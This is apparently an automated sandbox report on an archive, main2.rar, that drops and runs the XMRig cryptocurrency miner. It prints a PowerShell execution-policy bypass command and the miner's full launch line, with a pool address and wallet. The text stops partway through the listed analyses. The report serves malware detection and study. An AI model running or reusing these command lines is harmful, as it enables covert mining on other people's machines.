Malware Analysis Report

2025-04-19 19:06

Sample ID 240526-qtz8tagc81
Target main2.rar
SHA256 08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b
Tags
xmrig execution miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral29

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral31

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral30

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral32

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b

Threat Level: Known bad

The file main2.rar was found to be: Known bad.

Malicious Activity Summary

xmrig execution miner

XMRig Miner payload

xmrig

Blocklisted process makes network request

Executes dropped EXE

Command and Scripting Interpreter: PowerShell

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious behavior: LoadsDriver

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-26 13:33

Signatures

N/A

Analysis: behavioral14

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 00:50

Platform

win10-20240404-en

Max time kernel

1799s

Max time network

1786s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 14.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp

Files

memory/2736-3-0x00007FFF18473000-0x00007FFF18474000-memory.dmp

memory/2736-5-0x000001E26A650000-0x000001E26A672000-memory.dmp

memory/2736-8-0x00007FFF18470000-0x00007FFF18E5C000-memory.dmp

memory/2736-9-0x000001E26A950000-0x000001E26A9C6000-memory.dmp

memory/2736-10-0x00007FFF18470000-0x00007FFF18E5C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qiqycppp.5zi.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/2736-25-0x00007FFF18470000-0x00007FFF18E5C000-memory.dmp

memory/2736-61-0x000001E26A6E0000-0x000001E26A6EA000-memory.dmp

memory/2736-48-0x000001E26A700000-0x000001E26A712000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2716-90-0x000001A6ED0F0000-0x000001A6ED110000-memory.dmp

memory/2716-91-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-92-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2736-93-0x00007FFF18470000-0x00007FFF18E5C000-memory.dmp

memory/2736-94-0x00007FFF18473000-0x00007FFF18474000-memory.dmp

memory/2736-95-0x00007FFF18470000-0x00007FFF18E5C000-memory.dmp

memory/2736-96-0x00007FFF18470000-0x00007FFF18E5C000-memory.dmp

memory/2716-97-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-98-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-99-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-100-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-101-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-102-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-103-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-104-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-105-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-106-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-107-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-108-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-109-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-110-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-111-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-112-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-113-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-114-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-115-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-116-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-117-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-118-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-119-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-120-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-121-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-122-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-123-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-124-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-125-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-126-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-127-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-128-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-129-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-130-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-131-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-132-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-133-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-134-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-135-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-136-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-137-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-138-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-139-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-140-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-141-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-142-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-143-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-144-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-145-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-146-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-147-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-148-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-149-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-150-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-151-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-152-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-153-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-154-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-155-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-156-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-157-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 00:52

Platform

win7-20240221-en

Max time kernel

1561s

Max time network

1566s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Network

N/A

Files

memory/2812-12-0x000007FEF5420000-0x000007FEF5DBD000-memory.dmp

memory/2812-11-0x000007FEF5420000-0x000007FEF5DBD000-memory.dmp

memory/2812-10-0x000007FEF5420000-0x000007FEF5DBD000-memory.dmp

memory/2812-9-0x000007FEF5420000-0x000007FEF5DBD000-memory.dmp

memory/2812-8-0x000007FEF5420000-0x000007FEF5DBD000-memory.dmp

memory/2812-7-0x000007FEF5420000-0x000007FEF5DBD000-memory.dmp

memory/2812-6-0x0000000002290000-0x0000000002298000-memory.dmp

memory/2812-5-0x000000001B360000-0x000000001B642000-memory.dmp

memory/2812-4-0x000007FEF56DE000-0x000007FEF56DF000-memory.dmp

Analysis: behavioral29

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 03:40

Platform

win10-20240404-en

Max time kernel

1796s

Max time network

1754s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 209.143.182.52.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp

Files

memory/3968-0-0x00007FF992773000-0x00007FF992774000-memory.dmp

memory/3968-5-0x000002A6599B0000-0x000002A6599D2000-memory.dmp

memory/3968-8-0x000002A672030000-0x000002A6720A6000-memory.dmp

memory/3968-9-0x00007FF992770000-0x00007FF99315C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gtg2x3hh.ro5.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3968-20-0x00007FF992770000-0x00007FF99315C000-memory.dmp

memory/3968-25-0x00007FF992770000-0x00007FF99315C000-memory.dmp

memory/3968-48-0x000002A671ED0000-0x000002A671EE2000-memory.dmp

memory/3968-61-0x000002A659A00000-0x000002A659A0A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4816-90-0x000002177A1E0000-0x000002177A200000-memory.dmp

memory/4816-91-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/3968-92-0x00007FF992773000-0x00007FF992774000-memory.dmp

memory/3968-93-0x00007FF992770000-0x00007FF99315C000-memory.dmp

memory/4816-94-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-95-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-96-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-97-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-98-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-99-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-100-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-101-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-102-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-103-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-104-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-105-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-106-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-107-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-108-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-109-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-110-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-111-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-112-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-113-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-114-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-115-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-116-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-117-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-118-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-119-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-120-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-121-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-122-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-123-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-124-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-125-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-126-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-127-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-128-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-129-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-130-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-131-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-132-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-133-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-134-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-135-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-136-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-137-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-138-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-139-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-140-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-141-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-142-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-143-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-144-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-145-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-146-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-147-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-148-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-149-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-150-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-151-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-152-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-153-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-154-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-155-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 00:49

Platform

win7-20240221-en

Max time kernel

1560s

Max time network

1561s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Network

N/A

Files

memory/2904-4-0x000007FEF4FCE000-0x000007FEF4FCF000-memory.dmp

memory/2904-5-0x000000001B580000-0x000000001B862000-memory.dmp

memory/2904-7-0x000007FEF4D10000-0x000007FEF56AD000-memory.dmp

memory/2904-6-0x0000000002690000-0x0000000002698000-memory.dmp

memory/2904-8-0x000007FEF4D10000-0x000007FEF56AD000-memory.dmp

memory/2904-9-0x000007FEF4D10000-0x000007FEF56AD000-memory.dmp

memory/2904-10-0x000007FEF4D10000-0x000007FEF56AD000-memory.dmp

memory/2904-11-0x000007FEF4D10000-0x000007FEF56AD000-memory.dmp

memory/2904-12-0x000007FEF4D10000-0x000007FEF56AD000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 00:50

Platform

win11-20240426-en

Max time kernel

1798s

Max time network

1802s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
